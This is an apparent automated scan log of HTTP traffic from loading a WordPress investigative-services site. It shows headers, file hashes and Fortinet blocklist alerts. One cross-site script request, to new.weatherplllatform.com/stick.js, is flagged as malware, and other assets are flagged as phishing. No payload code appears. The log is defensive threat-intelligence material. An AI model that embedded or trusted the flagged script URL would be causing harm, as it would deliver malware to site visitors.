content-length: 4453
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27639), with no line terminators
Size:   4453
Md5:    9a93ae1de173786cb8670757ce07ed80
Sha1:   170b12a94a2ca458187d9f25c707c3f870bec587
Sha256: b260eed4f4b87de1f3bbdbf96abfb9c75eba4ae837e75cf089bf52e2ef26108d

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/style.min.css?ver=3.16.20 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2589
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (13120), with no line terminators
Size:   2589
Md5:    59b798d32f197ea7d262142759028880
Sha1:   7692ac7ae52b6b3157eae18315d5564977319fe3
Sha256: 74f0e6b4b95c0664cec0ede4f3bab4220795ccc4ff2969ee999eb33a51f15040

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/animate.min.css?ver=3.16.20 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5315
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (64385), with CRLF line terminators
Size:   5315
Md5:    e7523a2ac28478012d103baf4a862383
Sha1:   3c38a1429969faba810fcb9d10d5b65ecdca6522
Sha256: 02cf680e235017a8f7995e20f36a01e2ed8adf91bc1a9ae8b925e3a763e85276
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/info-box.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 726
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4226), with no line terminators
Size:   726
Md5:    cccfc375a4b7c23c0b71a987977211fb
Sha1:   1fc21746e1a1859abf1f6edcb47d6e78662c554f
Sha256: 54c1a866ee8cb7d5eec36d5e990e63eb476550da00d9e01a1ff6946ae11c6290

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/tooltip.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 355
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1722), with no line terminators
Size:   355
Md5:    8b21080f21d849ab9195b6d9b0fcb2c0
Sha1:   8b64cf542df285e1e8d9b63809709c9800b74e23
Sha256: 14df78e66e879afd052f2a7bc8e44eb8696f6669fff23489bbbb92288504a423
                                        
                                            GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/pricing.min.css?ver=3.16.20 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2140
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (19727), with no line terminators
Size:   2140
Md5:    f4e58bea72fb6492b3a8b4dba3bf7196
Sha1:   bc3083ca8fb8dc08cc4c72ea28ffb1bdcf6ba6a1
Sha256: e108b37164778bb7d7435c7c8c2ca9a610ddfe86897a96f47590b436a8558d0d
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Fri, 04 Nov 2022 04:57:04 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5329
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11126)
Size:   5329
Md5:    27caf644710e18abaa6e9a6f9f69a153
Sha1:   65b5863671e5f02eea7ba47a872e2c35fb9de86a
Sha256: 4ec315ca9e66bf8925f0a7da38cf19a5bd7375ccd98befb14940dacb88e77d93

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/the-guard/js/modernizr.custom.57510.js?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6368
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (12015), with CRLF, LF line terminators
Size:   6368
Md5:    83a28b1843349f93ba64f39bf6dd37f2
Sha1:   4e7ec87aa99ac0185f2b80f40c0e218a97c61e62
Sha256: 6c039853b43bc764af691d55da05fb9e4e7293c9c59516a3f1fcaec14ffa844d
                                        
                                            GET /wp-content/plugins/responsive-lightbox/assets/swipebox/jquery.swipebox.min.js?ver=2.3.3 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4928
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (12939)
Size:   4928
Md5:    f4ecc7ee8d0efc1a96a42fe720e92bc6
Sha1:   ffa79362a0b85af53e98959104f8d73792e4950e
Sha256: f4d21437bed9492d3aaa0e4bf0e06dc7454af6252a0c73b0dfe4dcc06af16191
                                        
                                            GET /wp-includes/js/underscore.min.js?ver=1.13.4 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Fri, 04 Nov 2022 04:57:04 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 8519
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (18820)
Size:   8519
Md5:    2567317f433be2a1a4fbadfd978315a0
Sha1:   7c039fee4862e5946f8eb03436d57cde26d4dea6
Sha256: 6b62e4aeb3100e67d506c6c9c7d9b403500e0d7f20effc50595b52fbc4c236c5
                                        
                                            GET /wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 8127
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (25603), with CRLF, LF line terminators
Size:   8127
Md5:    d5729e40d87fb8a3c2c74a7384a66d47
Sha1:   4ded62726c04644a27f63d2023d3547a1dedb6cf
Sha256: 2363ebb650106922f6077bcc3fab0c15ae4afaa5ae30d012c9c6f2a822a7e8b5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/responsive-lightbox/js/front.js?ver=2.3.3 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6614
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (641), with CRLF, LF line terminators
Size:   6614
Md5:    edb09a5b05154c49dcca74eaa64b9929
Sha1:   9fc70ce188c3f5e3ad0bca46daacfe67aff533a4
Sha256: 340bcdf028ec146517b78de921121cc335c2c5aa955c4b941b79377933d89211
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EF0F5B2AB2055446D4EA8B738F605C3BF835CF72E872D6A9C9A6C9B2917737E7"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9518
Expires: Sun, 04 Dec 2022 16:31:16 GMT
Date: Sun, 04 Dec 2022 13:52:38 GMT
Connection: keep-alive

                                        
                                            GET /stick.js?v=9.00 HTTP/1.1 
Host: new.weatherplllatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         91.211.91.114
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:38 GMT
last-modified: Sun, 06 Nov 2022 00:27:12 GMT
vary: Accept-Encoding
etag: W/"6366ff60-a40"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   17270
Md5:    79d05cd02038bb248d24d4af4fe73c8a
Sha1:   2780c99d5649960cc2df3ee149d75e000afb7948
Sha256: 880eb6b85d6be5c631e7c9e35112b679a99611f0e47e3fa4bb5463251b6286cb

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fae18d1b5-3b75-4897-bd1b-03651e437c2e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4666
x-amzn-requestid: 850d341f-5ccb-453c-8adf-a8194f8fbdad
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: clr_-GiboAMFwww=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc066-766293f2526e637235067aca;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:32:22 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: z5uqgjB-Bsl0U55a8aFi37cpJ65Vnbjm6bJ2GnMpaO7RXsMZsOCbPQ==
via: 1.1 112c6b3f9aea37a6cb00b7d933e5af6e.cloudfront.net (CloudFront), 1.1 b2f9564ebf9c745cc2ceae96d434977e.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:44:01 GMT
age: 58117
etag: "a9a529dc9894827f6243a1bf57f81caa4fe88fc2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4666
Md5:    c01fe1cccdb3b672bbade6d98217ffe9
Sha1:   a9a529dc9894827f6243a1bf57f81caa4fe88fc2
Sha256: c43da6212c79a08e22e78e04e99e8f5422e64b4b0a87f30b7907f1b4bc675c71
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F19c9bb39-be15-49f9-aad9-2cc511601111.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8989
x-amzn-requestid: abce0b01-f70c-42ad-b242-5a24735fe4c2
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cltl4Gk2oAMFSWQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc2f2-1cccffff5199dffe70264a95;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:43:14 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: PFl7VUrzRkMFNnTiIw_cbGCyrEFn43eUSlZfT0nUhUmjjyXT7JfjMA==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 d8792dbd3191bbe722eba5b536b979c8.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:50:01 GMT
age: 57757
etag: "fc5d4f3163ebb9faf85968cbb1d194e8e68418be"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8989
Md5:    a6e7b32ac999cf3c899a234c621fa91a
Sha1:   fc5d4f3163ebb9faf85968cbb1d194e8e68418be
Sha256: f12db3aed126006fee00649aba0b3eaae900de200b85b9523866a90b5494f18e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd528f6ee-d348-431d-8220-5c8b154b2941.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8315
x-amzn-requestid: f1bcc33b-aad9-4d3b-b1f9-49282f2d4fb9
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: clsAMGVboAMFfxg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc067-13472a097177d4751c8f7a8c;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:32:23 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 6UQ_BhPmpVpe9w6gsExB-EpNq_syeCCK6fr4Y1FFK1jDJh_n1Sd0Eg==
via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 556b99c6be8d7078b9f067347c62df6a.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:52:47 GMT
age: 57591
etag: "22a8c4bd58c729c1abcf794466e8f3231dfb034b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8315
Md5:    db1701b7b9d161a0c935bb6e10b17893
Sha1:   22a8c4bd58c729c1abcf794466e8f3231dfb034b
Sha256: b495524a33e5b1d3ba34cfbe867ada0da956c061370b1fcde06b23a6194a9787
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6df54ea7-8915-4ac7-af2b-6a71ce14dbf4.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5681
x-amzn-requestid: 8f0d66b8-d532-48d9-9a29-74540cd6ab3a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cltXnEotIAMFqkA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc296-27349a376ff819ab63b04a81;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:41:42 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: Uz-wJTZjej3sjP-O68BQ4hB_kkAecG0o7GkeZUan90ZgV87g0Cg_ZA==
via: 1.1 26ca01ec7377e425b59b6a08cb1ec342.cloudfront.net (CloudFront), 1.1 3cd7af07832481c336aa1c93c9b4a6fe.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:52:38 GMT
age: 57600
etag: "36f4682ca6a33ff80ee02129c77e6f27e996ede0"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


